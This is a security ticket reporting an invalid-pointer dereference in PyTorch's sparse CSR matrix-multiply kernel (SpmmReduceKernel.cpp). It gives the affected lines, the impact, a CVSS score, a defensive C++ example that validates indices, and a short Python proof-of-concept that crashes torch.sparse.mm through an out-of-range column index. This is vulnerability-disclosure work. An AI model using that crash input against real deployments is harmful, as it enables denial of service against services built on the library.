AI Platform Core Components / AIPCC-7709

[Security] NULL Pointer Dereference in SpmmReduceKernel.cpp


      Vulnerability Type: NULL Pointer Dereference (CWE-476)

      Location:

      • File: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp
      • Lines: 60-62

      Details:
      The _update function in SpmmReduceKernel.cpp dereferences out_ptr and other_ptr without checking whether they are NULL. This occurs in the scalar fallback loop at lines 60-62. The vulnerability is triggered by creating a sparse CSR tensor with invalid col_indices that exceed the dimensions, which causes other_ptr = other_data + c * K to point to invalid memory or NULL. When the vectorized loops finish and the scalar loop executes, the NULL dereference occurs.

      The vulnerability affects torch.sparse.mm() when used with the reduce parameter on CPU operations.
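
One way to close this class of bug, as an added example that is not code from the PyTorch source or from this report: a stand-alone CSR x dense sum that validates crow_indices and col_indices before any column index is turned into the offset c * K. The function name checked_spmm_sum, its signature and the sample data are assumptions constructed for illustration.

```cpp
#include <cstdint>
#include <cstdio>
#include <vector>

// Hypothetical stand-alone CSR x dense product with a 'sum' reduction.
// `other` is row-major with shape [other_rows, K]; result is [M, K].
// Returns false, leaving `out` untouched, when the CSR indices are invalid.
bool checked_spmm_sum(const std::vector<int64_t>& crow,
                      const std::vector<int64_t>& col,
                      const std::vector<float>& val,
                      int64_t M, int64_t other_rows, int64_t K,
                      const std::vector<float>& other,
                      std::vector<float>& out) {
  const int64_t nnz = static_cast<int64_t>(col.size());
  // Structural invariants of the compressed row pointer array.
  if (M < 0 || K < 0 || other_rows < 0) return false;
  if (static_cast<int64_t>(crow.size()) != M + 1) return false;
  if (static_cast<int64_t>(val.size()) != nnz) return false;
  if (static_cast<int64_t>(other.size()) != other_rows * K) return false;
  if (crow.front() != 0 || crow.back() != nnz) return false;
  for (int64_t m = 0; m < M; ++m)
    if (crow[m] > crow[m + 1]) return false;
  // Each column index selects a row of `other`; reject anything outside it
  // before it is ever used as a pointer offset (c * K).
  for (int64_t c : col)
    if (c < 0 || c >= other_rows) return false;

  out.assign(static_cast<size_t>(M * K), 0.0f);
  for (int64_t m = 0; m < M; ++m) {
    float* out_ptr = out.data() + m * K;
    for (int64_t e = crow[m]; e < crow[m + 1]; ++e) {
      const float* other_ptr = other.data() + col[e] * K;  // in bounds here
      for (int64_t k = 0; k < K; ++k) out_ptr[k] += val[e] * other_ptr[k];
    }
  }
  return true;
}

int main() {
  // Constructed sample: 2x3 sparse matrix times a 3x2 dense matrix.
  std::vector<float> other = {1, 2, 3, 4, 5, 6}, out;
  bool ok = checked_spmm_sum({0, 1, 2}, {0, 2}, {1.0f, 2.0f}, 2, 3, 2, other, out);
  std::printf("valid: %d -> [%g %g; %g %g]\n", ok, out[0], out[1], out[2], out[3]);
  // Constructed invalid input: column index 10 is outside the dense operand.
  ok = checked_spmm_sum({0, 1, 2}, {0, 10}, {1.0f, 2.0f}, 2, 3, 2, other, out);
  std::printf("col index 10 accepted: %d\n", ok);
  return 0;
}
```
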

      Impact:

      • Segmentation fault leading to Denial of Service (DoS)
      • Potential information disclosure through invalid memory reads
      • Memory corruption through invalid pointer arithmetic
      • Crash when accessing invalid memory addresses

      Exploit Code (first 50 lines):

      #!/usr/bin/env python3
      import torch
      import sys
      
      def exploit_null_pointer_dereference():
          print("CVE Exploit: NULL Pointer Dereference in torch.sparse.mm()")
          print("Location: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp:60-62")
          
          # Create a sparse CSR tensor with invalid column indices
          # Column index exceeds dense matrix dimensions
          crow_indices = torch.tensor([0, 1, 2], dtype=torch.int64)
          col_indices = torch.tensor([0, 10], dtype=torch.int64)
          values = torch.tensor([1.0, 2.0], dtype=torch.float32)
      
          sparse_matrix = torch.sparse_csr_tensor(
              crow_indices=crow_indices,
              col_indices=col_indices,
              values=values,
              size=(2, 5),
              dtype=torch.float32,
              device='cpu'
          )
      
          dense_matrix = torch.randn(3, 4, dtype=torch.float32, device='cpu')
          result = torch.sparse.mm(sparse_matrix, dense_matrix, reduce='sum')
      

      Severity: High
      CVSS Score: 7.5

      Source File: /pytorch/results/exploit_cve1_null_pointer_spmm.py

              rh-ee-rpunia Riya Punia